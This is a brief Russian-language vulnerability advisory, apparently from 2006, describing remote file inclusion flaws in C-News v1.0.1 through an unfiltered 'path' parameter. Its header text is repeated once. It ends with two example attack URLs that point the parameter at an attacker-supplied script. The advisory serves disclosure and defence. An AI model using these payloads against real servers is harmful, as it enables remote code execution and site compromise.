C-News v 1.0.1 < = Multiple Remote File Include Vulnerabilities
Дата: 10 сентября 2006 г.
Автор: ThE__LeO
ПО: C-News v 1.0.1
Описание:
Входные данные в параметре path не достаточно фильтруются перед использованием, что и позволяет заинклудить удаленный файл.
Примеры:
источник: www.securityfocus.com
Дата: 10 сентября 2006 г.
Автор: ThE__LeO
ПО: C-News v 1.0.1
Описание:
Входные данные в параметре path не достаточно фильтруются перед использованием, что и позволяет заинклудить удаленный файл.
Примеры:
Код:
http://Www.Example.Com/[Script]/affichage/pagination.php?path=[U r Evil Script]
http://Www.Example.Com/[Script]/affichage/formulaire_commentaires.php?pa
th=[U r Evil Script]